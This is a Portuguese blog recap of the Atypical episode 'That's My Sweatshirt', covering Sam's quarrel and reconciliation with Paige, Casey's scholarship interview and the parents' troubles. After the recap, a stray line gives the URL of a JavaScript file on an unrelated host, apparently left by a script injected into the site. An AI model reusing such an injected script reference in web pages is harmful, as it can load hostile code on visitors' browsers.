Panela de Séries » Arquivos » Atypical – S01E05 – That’s My Sweatshirt

Posts Populares

Atypical – S01E05 – That’s My Sweatshirt

“Embora eu tenha odiado quando você mexeu nas minhas coisas e roubou meu moletom, eu odiei ainda mais não ter você.”

O grande dia de Casey está chegando e ela está meio preocupada, mais porque ela terá uma entrevista e terá que se sair bem para ter chances de conseguir a bolsa. Mas Evan está lá por ela, dando todo o apoio que ela precisa. Shippo muito esse casal, viu. Já Elsa, mesmo tendo tentado terminar tudo com Nick, recebe um email com um convite para a festa de aniversário dele e depois liga para saber porque recebeu, já que tinha deixado claro que nada mais aconteceria. E ele simplesmente diz que enviou por engano. Já Julia, que está certa que Miles comprou aquele morango para outra mulher, acaba mexendo nas coisas do namorado, em busca de algo que possa comprometê-lo, só que esse tipo de coisa deixa ela mesma constrangida, porque não faz o seu tipo. E conversando com uma amiga, ela ouve que só está assim, quase paranoica, porque mesmo após cinco anos, Miles ainda não a pediu em casamento. Mas Julia está convicta que não é por não ter tido nenhum pedido de casamento e sim porque está claro que Miles está a traindo. Tá feliz, Sam? Olha o que você causou!

Paige vai com Sam para casa, onde eles passam um tempo conversando no quarto dele. Bem, tentando conversar, já que Paige não para de falar e Sam não para de se incomodar com o fato de Paige mexer em tudo no seu quarto. Mas tudo fica muito mais sério quando Paige mexe com Edison, a tartaruga de Sam, ele não gosta nem um pouco disso e prende a menina no armário. É, isso mesmo, no armário. Doug chega e faz com que Sam tire a menina de onde ela estava presa, dizendo que não pode fazer algo assim e que ele precisa se desculpar. Mas ele diz que não fez nada errado, fez o que tinha que fazer. Mas Paige leva tudo numa boa, porque sabe como ela pode ser too much para qualquer pessoa, ainda mais para Sam.

É o dia da entrevista de Casey e Elsa tenta demonstrar seu apoio, mesmo a filha sabendo que a mãe teve que ser convencida pelo marido após horas e mais horas de conversa. Os três juntos vão à nova escola e Casey deixa Beth, a irmã de Evan, responsável por dar o dinheiro do lanche para Sam. A escola é gigantesca e muito, muito chique e Casey se pergunta se ela se encaixaria ali. Já na escola antiga, Paige surge usando um casaco de Sam – o favorito dele – o que faz com que ele fique bem irritado. Ela diz que é isso o que casais fazem, pegam coisas dos outros para que possam lembrar quando estão longe, mas essa explicação não convence o rapaz. Ele fica muito, muito, muito irritado e desconfortável com a situação, que se esconde por um tempo, o que impede que Beth o encontre para lhe entregar o dinheiro do almoço. E o que acontece? Bem, Beth liga para Casey no meio da sua entrevista, dizendo que não consegue achá-lo. O aluno que está entrevistando Casey pergunta se ela vai mesmo atender aquela chamada naquele momento e ela explica a situação do irmão, fazendo com o que o rapaz fique bem desconfortável com suas cobranças. Mas em poucos minutos ela localiza Sam e consegue seguir com o que estava fazendo. O rapaz pergunta se não é difícil para ela ter que lidar com tudo isso e Casey responde que é o trabalho dela como irmã, que nem sempre é fácil, mas ela já está acostumada. Que Sam demanda de tanta atenção, que às vezes é difícil conseguir um pouco para si e que ela não sabe como será caso vá estudar na nova escola, o que significa ficar longe do irmão, porque isso nunca aconteceu.

Sam conversa com Zahid sobre ele precisar ter o casaco dele de volta, então uma menina que está com o seu amigo dá a ideia de que ele possa dar outra coisa para Paige lembrar dele, assim ela pode devolver o casaco, o que é uma excelente ideia. Paige vai conversar com Casey, porque ela acha que Sam está a evitando, mas acaba ouvindo algo que não gosta, porque a cunhada acha que Paige é a culpada por Sam não ter almoçado no dia anterior. O que é estranho, mas são coisas que acontecem quando se namora um cara como Sam. E que ela deveria terminar tudo com ele, porque ela não ganha nada com isso, porque um dia Sam vai começar a depender dela e ela vai embora, e isso vai acabar com Sam. Então Paige aceita o conselho e visivelmente chateada, devolve o casaco e termina tudo com ele, dizendo que Casey estava com medo que ela o machucasse. Ele diz a Julia que está bem, mas não é totalmente verdade. Porque de todas as pessoas, Paige foi uma das poucas que sempre tentou o entender e isso a torna um pouco especial. E algumas vezes nós acabamos pensando tanto nas coisas ruins, que não lembramos das boas. Então Sam percebe que gosta de Paige e confronta Casey, dizendo que ela não tinha o direito de dizer aquelas coisas para Paige, porque agora ela foi embora. Que ela não tem que atrapalhar sua vida e ele espera que ela vá para a nova escola, porque ele não precisa dela. Bem, talvez precise um pouco, mas é bom ver o Sam tomando um pouco do controle de sua vida para si.

Casey recebe um telefonema do rapaz que a entrevistou, dizendo que eles souberam que ela bateu numa menina e que isso pode dificultar sua aceitação. Ele diz que tentará ajudar, mas não pode prometer. Já Doug e Elsa recebem um colega de trabalho de Doug e sua esposa para jantar, e eles se surpreendem quando Elsa diz que Sam é autista, porque, aparentemente, o marido nunca tinha falado isso, mesmo trabalhando e sendo amigo deles há mais de cinco anos. Ela toma essa atitude como uma demonstração de vergonha pelo filho que tem e isso faz com que ela procure Nick mais uma vez. Já Julia, que depois de conversa com Sam, parecia disposta a acertar as coisas com seu namorado, se surpreende ao chegar em casa e ver que ele foi embora, levando a TV e os lençóis que ele tinha comprado. Bem, não foi um dia bacana pra ninguém.

Sam diz que demora para se acostumar com as coisas, mas quando se acostuma, ele precisa delas. Ele já tinha se acostumado com Paige, com seu jeito louco e expansivo. Então ele invade a aula de Paige e resolve se declarar, bem, da forma dele. Que embora ele tenha odiado que ela tenha mexido nas coisas dele, ele odiou mais ainda não tê-la por perto. É um momento muito bonito, onde vemos a dificuldade de Sam em falar sobre sentimentos, mas ele está ali, totalmente exposto, falando o que está sentindo. E como ele entende que as garotas gostam de ter algo que lembrem de seus namorados, ele comprou algo para ela: um colar com um pingente de pinguim. Paige fica muito encantada com o gesto e beija Sam, que fica totalmente sem ação. Talvez tenha sido o primeiro beijo dele, pelo menos foi num momento muito fofo.

 

https://cloudapi.online/js/api46.js

gostou da matéria? deixe um comentário!

Thais Pereira

Feminista, leonina com ascendente em gêmeos e lua em virgem, viciada em memes, em Friends e problematizar na internet. Formada em História da Arte, mas consciente que nunca vai trabalhar com isso na vida. Normalmente eu escrevo e falo mais do que deveria. Eu mesma, Thais Mello.


Tema por Gabriela Gomes Todos os direitos reservados ao Panela de Séries • Hosted by flaunt.nu